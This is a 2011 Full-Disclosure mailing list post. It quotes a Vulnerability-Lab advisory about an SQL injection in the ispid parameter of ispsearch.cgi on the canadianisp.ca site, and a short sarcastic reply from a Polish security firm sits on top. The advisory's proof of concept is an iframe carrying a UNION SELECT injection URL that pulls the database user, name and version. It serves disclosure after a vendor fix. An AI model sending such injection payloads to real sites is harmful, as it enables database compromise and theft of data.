Maybe we will post 20-40 pages per day in which we find critical vulnerabilities ?
.... MG Wiadomość napisana przez [email protected] w dniu 4 paź 2011, o godz. 16:46: > Title: > ====== > Canadian ISP Website - SQL Injection Vulnerability > > > Date: > ===== > 2011-09-23 > > > > VL-ID: > ===== > 282 > > > Reference: > ========== > http://www.vulnerability-lab.com/get_content.php?id=282 > > > Introduction: > ============= > Canadianisp.ca - Is a wholly owned project of Marc Bissonnette / > InternAlysis. > It was originally created as a joint venture with Bob Carrick of Carrick > Solutions, with sole ownership > transferring to Marc Bissonnette on February 16th, 2004. Canadianisp.ca > is the only website that allows > you to search for an Internet service provider (Dial-up, ISDN, DSL, > Cable, Satellite, Point to Point, Wireless > and Voice Over IP (VoIP)) anywhere in Canada. Customers can post > reviews, and ISPs submit their own services. > All for free. CanadianISP is also one of the most accurate and most > up-to-date ISP lists on the net. There are > many ISP lists out there, but the vast majority of them (as far as we > have seen and we last searched and looked > in April of 2011) are out of date, listing companies no longer in > business, no longer providing connectivity > or simply pages of ads with no relevance to the users search parameters. > ISPs can submit and edit / update their own services at all times, free > of charge. > > (Copy of the Vendor Homepage: www.canadianisp.ca/about.htm) > > > Abstract: > ========= > Vulnerability-Lab Team discovered a critical remote SQL Injection > vulnerability on the Canadian ISP main vendor website. > > > Report-Timeline: > ================ > 2011-09-24: Vendor Notification > 2011-10-03: Vendor Response/Feedback > 2011-10-04: Vendor Fix/Patch > 2011-10-04: Public or Non-Public Disclosure > > > Status: > ======== > Published > > > Affected Products: > ================== > Canadian ISP Website - 2011/Q2-3 > > > Exploitation-Technique: > ======================= > Remote > > > Severity: > ========= > Critical > > > Details: > ======== > A SQL Injection vulnerability is detected on canadians isp website. The > bug allows remote attackers to inject/execute > own sql statements/commands over a vulnerable applicataion parameter on > the main web service. Successful exploitation > of the remote sql injection vulnerability can result in database > managemtn system compromise & website manipulations. > > Vulnerable Module(s): > [+] ispsearch.cgi > > Vulnerable Param(s): > [+] ispid > > > Pictures: > ../1.png > > > Proof of Concept: > ================= > The vulnerability can be exploited by remote attackers without user > inter action. For demonstration or reproduce ... > > <html> > <head><body> > <title>Remote SQL Injection PoC - CANADIAN ISP</title> > <iframe > src=http://www.canadianisp.ca/cgi-bin/ispsearch.cgi?f=ShowDetail&ispid=19+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, > 48,49,50,51,52,53,54,55,56,57,58,concat_ws%280x3a3a,user%28%29,database%28%29,version%28%29%29,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100, > 101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134, > 135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168, > 169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202, > 203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236, > 237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270, > 271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304, > 305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338, > 339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372, > 373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406, > 407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440, > 441,442,443,444,445,446,447--> > <br><br> > </body></head> > </html> > > > Risk: > ===== > The security risk of the remote sql injection vulnerability is estimated > as critical. > > > Credits: > ======== > Vulnerability Research Laboratory - Chokri B.A. (Me!ster) [TN] > > > Disclaimer: > =========== > The information provided in this advisory is provided as it is without > any warranty. Vulnerability-Lab disclaims all warranties, > either expressed or implied, including the warranties of merchantability > and capability for a particular purpose. Vulnerability- > Lab or its suppliers are not liable in any case of damage, including > direct, indirect, incidental, consequential loss of business > profits or special damages, even if Vulnerability-Lab or its suppliers > have been advised of the possibility of such damages. Some > states do not allow the exclusion or limitation of liability for > consequential or incidental damages so the foregoing limitation > may not apply. Any modified copy or reproduction, including partially > usages, of this file requires authorization from Vulnerability- > Lab. Permission to electronically redistribute this alert in its > unmodified form is granted. All other rights, including the use of > other media, are reserved by Vulnerability-Lab or its suppliers. > > Copyright © 2011|Vulnerability-Lab > > -- > Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com > Contact: [email protected] or [email protected] > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Ariko-Security Rynek Glowny 12 32-600 Oswiecim tel:. +48 33 4741511 mobile: +48 784086818 (Mo-Fr 10.00-20.00 CET) Ariko-Security Sp. z o.o. z siedzibą w Oświęcimiu , zarejestrowana przez Sąd Rejonowy dla m. Krakowa-Śródmieścia, XII Wydział Gospodarczy Krajowego Rejestru Sądowego, KRS: 00000358273, NIP: 549-239-90-67, REGON 121262172
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
